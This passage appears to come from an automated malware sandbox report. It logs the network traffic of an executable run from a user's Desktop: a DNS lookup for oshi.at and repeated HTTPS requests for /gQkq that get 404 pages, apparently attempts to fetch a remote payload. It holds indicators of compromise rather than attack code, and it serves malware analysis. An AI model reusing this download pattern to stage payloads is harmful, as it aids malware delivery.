                                                            Jan 10, 2025 18:59:43.967631102 CET50054443192.168.2.9194.15.112.248
                                                            Jan 10, 2025 18:59:43.968225956 CET50054443192.168.2.9194.15.112.248
                                                            Jan 10, 2025 18:59:43.968839884 CET50055443192.168.2.9194.15.112.248
                                                            Jan 10, 2025 18:59:43.968902111 CET44350055194.15.112.248192.168.2.9
                                                            Jan 10, 2025 18:59:43.968987942 CET50055443192.168.2.9194.15.112.248
                                                            Jan 10, 2025 18:59:43.969216108 CET50055443192.168.2.9194.15.112.248
                                                            Jan 10, 2025 18:59:43.969224930 CET44350055194.15.112.248192.168.2.9
                                                            Jan 10, 2025 18:59:45.200392008 CET44350055194.15.112.248192.168.2.9
                                                            Jan 10, 2025 18:59:45.243664026 CET50055443192.168.2.9194.15.112.248
                                                            Jan 10, 2025 18:59:45.318805933 CET50055443192.168.2.9194.15.112.248
                                                            Jan 10, 2025 18:59:45.318834066 CET44350055194.15.112.248192.168.2.9
                                                            Jan 10, 2025 18:59:45.905831099 CET44350055194.15.112.248192.168.2.9
                                                            Jan 10, 2025 18:59:45.905858994 CET44350055194.15.112.248192.168.2.9
                                                            Jan 10, 2025 18:59:45.905936003 CET44350055194.15.112.248192.168.2.9
                                                            Jan 10, 2025 18:59:45.905961990 CET50055443192.168.2.9194.15.112.248
                                                            Jan 10, 2025 18:59:45.905992985 CET50055443192.168.2.9194.15.112.248
                                                            Jan 10, 2025 18:59:45.906537056 CET50055443192.168.2.9194.15.112.248
                                                            Jan 10, 2025 18:59:45.907095909 CET50056443192.168.2.9194.15.112.248
                                                            Jan 10, 2025 18:59:45.907182932 CET44350056194.15.112.248192.168.2.9
                                                            Jan 10, 2025 18:59:45.907275915 CET50056443192.168.2.9194.15.112.248
                                                            Jan 10, 2025 18:59:45.907470942 CET50056443192.168.2.9194.15.112.248
                                                            Jan 10, 2025 18:59:45.907502890 CET44350056194.15.112.248192.168.2.9
                                                            Jan 10, 2025 18:59:47.117379904 CET44350056194.15.112.248192.168.2.9
                                                            Jan 10, 2025 18:59:47.165673971 CET50056443192.168.2.9194.15.112.248

                                                            UDP Packets

                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Jan 10, 2025 18:56:40.350308895 CET5630253192.168.2.91.1.1.1
                                                            Jan 10, 2025 18:56:40.369090080 CET53563021.1.1.1192.168.2.9

                                                            DNS Queries

                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                            Jan 10, 2025 18:56:40.350308895 CET192.168.2.91.1.1.10xe1e2Standard query (0)oshi.atA (IP address)IN (0x0001)false

                                                            DNS Answers

                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                            Jan 10, 2025 18:56:40.369090080 CET1.1.1.1192.168.2.90xe1e2No error (0)oshi.at194.15.112.248A (IP address)IN (0x0001)false
                                                            Jan 10, 2025 18:56:40.369090080 CET1.1.1.1192.168.2.90xe1e2No error (0)oshi.at5.253.86.15A (IP address)IN (0x0001)false

                                                            HTTP Request Dependency Graph

                                                            • oshi.at

                                                            HTTPS Proxied Packets

                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            0192.168.2.949743194.15.112.2484437596C:\Users\user\Desktop\MWP0FO5rAF.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-10 17:56:42 UTC61OUTGET /gQkq HTTP/1.1
                                                            Host: oshi.at
                                                            Connection: Keep-Alive
                                                            2025-01-10 17:56:42 UTC158INHTTP/1.1 404 Not Found
                                                            Server: nginx
                                                            Date: Fri, 10 Jan 2025 17:56:42 GMT
                                                            Content-Type: text/html;charset=UTF-8
                                                            Content-Length: 1849
                                                            Connection: close
                                                            2025-01-10 17:56:42 UTC1849INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70
                                                            Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            1192.168.2.949756194.15.112.2484437596C:\Users\user\Desktop\MWP0FO5rAF.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-10 17:56:44 UTC37OUTGET /gQkq HTTP/1.1
                                                            Host: oshi.at
                                                            2025-01-10 17:56:45 UTC158INHTTP/1.1 404 Not Found
                                                            Server: nginx
                                                            Date: Fri, 10 Jan 2025 17:56:45 GMT
                                                            Content-Type: text/html;charset=UTF-8
                                                            Content-Length: 1849
                                                            Connection: close
                                                            2025-01-10 17:56:45 UTC1849INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70
                                                            Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            2192.168.2.949768194.15.112.2484437596C:\Users\user\Desktop\MWP0FO5rAF.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-10 17:56:46 UTC37OUTGET /gQkq HTTP/1.1
                                                            Host: oshi.at
                                                            2025-01-10 17:56:47 UTC158INHTTP/1.1 404 Not Found
                                                            Server: nginx
                                                            Date: Fri, 10 Jan 2025 17:56:47 GMT
                                                            Content-Type: text/html;charset=UTF-8
                                                            Content-Length: 1849
                                                            Connection: close
                                                            2025-01-10 17:56:47 UTC1849INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70
                                                            Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            3192.168.2.949782194.15.112.2484437596C:\Users\user\Desktop\MWP0FO5rAF.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-10 17:56:48 UTC37OUTGET /gQkq HTTP/1.1
                                                            Host: oshi.at
                                                            2025-01-10 17:56:49 UTC158INHTTP/1.1 404 Not Found
                                                            Server: nginx
                                                            Date: Fri, 10 Jan 2025 17:56:49 GMT
                                                            Content-Type: text/html;charset=UTF-8
                                                            Content-Length: 1849
                                                            Connection: close
                                                            2025-01-10 17:56:49 UTC1849INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70
                                                            Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            4192.168.2.949793194.15.112.2484437596C:\Users\user\Desktop\MWP0FO5rAF.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-10 17:56:50 UTC37OUTGET /gQkq HTTP/1.1
                                                            Host: oshi.at
                                                            2025-01-10 17:56:51 UTC158INHTTP/1.1 404 Not Found
                                                            Server: nginx
                                                            Date: Fri, 10 Jan 2025 17:56:51 GMT
                                                            Content-Type: text/html;charset=UTF-8
                                                            Content-Length: 1849
                                                            Connection: close
                                                            2025-01-10 17:56:51 UTC1849INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70
                                                            Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            5192.168.2.949804194.15.112.2484437596C:\Users\user\Desktop\MWP0FO5rAF.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-10 17:56:53 UTC37OUTGET /gQkq HTTP/1.1
                                                            Host: oshi.at
                                                            2025-01-10 17:56:54 UTC158INHTTP/1.1 404 Not Found
                                                            Server: nginx
                                                            Date: Fri, 10 Jan 2025 17:56:53 GMT
                                                            Content-Type: text/html;charset=UTF-8
                                                            Content-Length: 1849
                                                            Connection: close
                                                            2025-01-10 17:56:54 UTC1849INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70
                                                            Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            6192.168.2.949818194.15.112.2484437596C:\Users\user\Desktop\MWP0FO5rAF.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-10 17:57:04 UTC37OUTGET /gQkq HTTP/1.1
                                                            Host: oshi.at
                                                            2025-01-10 17:57:04 UTC158INHTTP/1.1 404 Not Found
                                                            Server: nginx
                                                            Date: Fri, 10 Jan 2025 17:57:04 GMT
                                                            Content-Type: text/html;charset=UTF-8
                                                            Content-Length: 1849
                                                            Connection: close
                                                            2025-01-10 17:57:04 UTC1849INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70
                                                            Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            7192.168.2.949870194.15.112.2484437596C:\Users\user\Desktop\MWP0FO5rAF.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-10 17:57:06 UTC37OUTGET /gQkq HTTP/1.1
                                                            Host: oshi.at
                                                            2025-01-10 17:57:07 UTC158INHTTP/1.1 404 Not Found
                                                            Server: nginx
                                                            Date: Fri, 10 Jan 2025 17:57:07 GMT
                                                            Content-Type: text/html;charset=UTF-8
                                                            Content-Length: 1849
                                                            Connection: close
                                                            2025-01-10 17:57:07 UTC1849INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70
                                                            Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            8192.168.2.949882194.15.112.2484437596C:\Users\user\Desktop\MWP0FO5rAF.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-10 17:57:08 UTC37OUTGET /gQkq HTTP/1.1
                                                            Host: oshi.at
                                                            2025-01-10 17:57:09 UTC158INHTTP/1.1 404 Not Found
                                                            Server: nginx
                                                            Date: Fri, 10 Jan 2025 17:57:08 GMT
                                                            Content-Type: text/html;charset=UTF-8
                                                            Content-Length: 1849
                                                            Connection: close
                                                            2025-01-10 17:57:09 UTC1849INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70
                                                            Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            9192.168.2.949890194.15.112.2484437596C:\Users\user\Desktop\MWP0FO5rAF.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-10 17:57:13 UTC37OUTGET /gQkq HTTP/1.1
                                                            Host: oshi.at
                                                            2025-01-10 17:57:14 UTC158INHTTP/1.1 404 Not Found
                                                            Server: nginx
                                                            Date: Fri, 10 Jan 2025 17:57:14 GMT
                                                            Content-Type: text/html;charset=UTF-8
                                                            Content-Length: 1849
                                                            Connection: close
                                                            2025-01-10 17:57:14 UTC1849INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70
                                                            Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            10192.168.2.949918194.15.112.2484437596C:\Users\user\Desktop\MWP0FO5rAF.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-10 17:57:15 UTC37OUTGET /gQkq HTTP/1.1
                                                            Host: oshi.at
                                                            2025-01-10 17:57:16 UTC158INHTTP/1.1 404 Not Found
                                                            Server: nginx
                                                            Date: Fri, 10 Jan 2025 17:57:16 GMT
                                                            Content-Type: text/html;charset=UTF-8
                                                            Content-Length: 1849
                                                            Connection: close
                                                            2025-01-10 17:57:16 UTC1849INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70
                                                            Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            11192.168.2.949929194.15.112.2484437596C:\Users\user\Desktop\MWP0FO5rAF.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-10 17:57:17 UTC37OUTGET /gQkq HTTP/1.1
                                                            Host: oshi.at
                                                            2025-01-10 17:57:18 UTC158INHTTP/1.1 404 Not Found
                                                            Server: nginx
                                                            Date: Fri, 10 Jan 2025 17:57:18 GMT
                                                            Content-Type: text/html;charset=UTF-8
                                                            Content-Length: 1849
                                                            Connection: close
                                                            2025-01-10 17:57:18 UTC1849INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70
                                                            Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            12192.168.2.949940194.15.112.2484437596C:\Users\user\Desktop\MWP0FO5rAF.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-10 17:57:20 UTC37OUTGET /gQkq HTTP/1.1
                                                            Host: oshi.at
                                                            2025-01-10 17:57:20 UTC158INHTTP/1.1 404 Not Found
                                                            Server: nginx
                                                            Date: Fri, 10 Jan 2025 17:57:20 GMT
                                                            Content-Type: text/html;charset=UTF-8
                                                            Content-Length: 1849
                                                            Connection: close
                                                            2025-01-10 17:57:20 UTC1849INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70
                                                            Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            13192.168.2.949956194.15.112.2484437596C:\Users\user\Desktop\MWP0FO5rAF.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-10 17:57:21 UTC37OUTGET /gQkq HTTP/1.1
                                                            Host: oshi.at
                                                            2025-01-10 17:57:23 UTC158INHTTP/1.1 404 Not Found
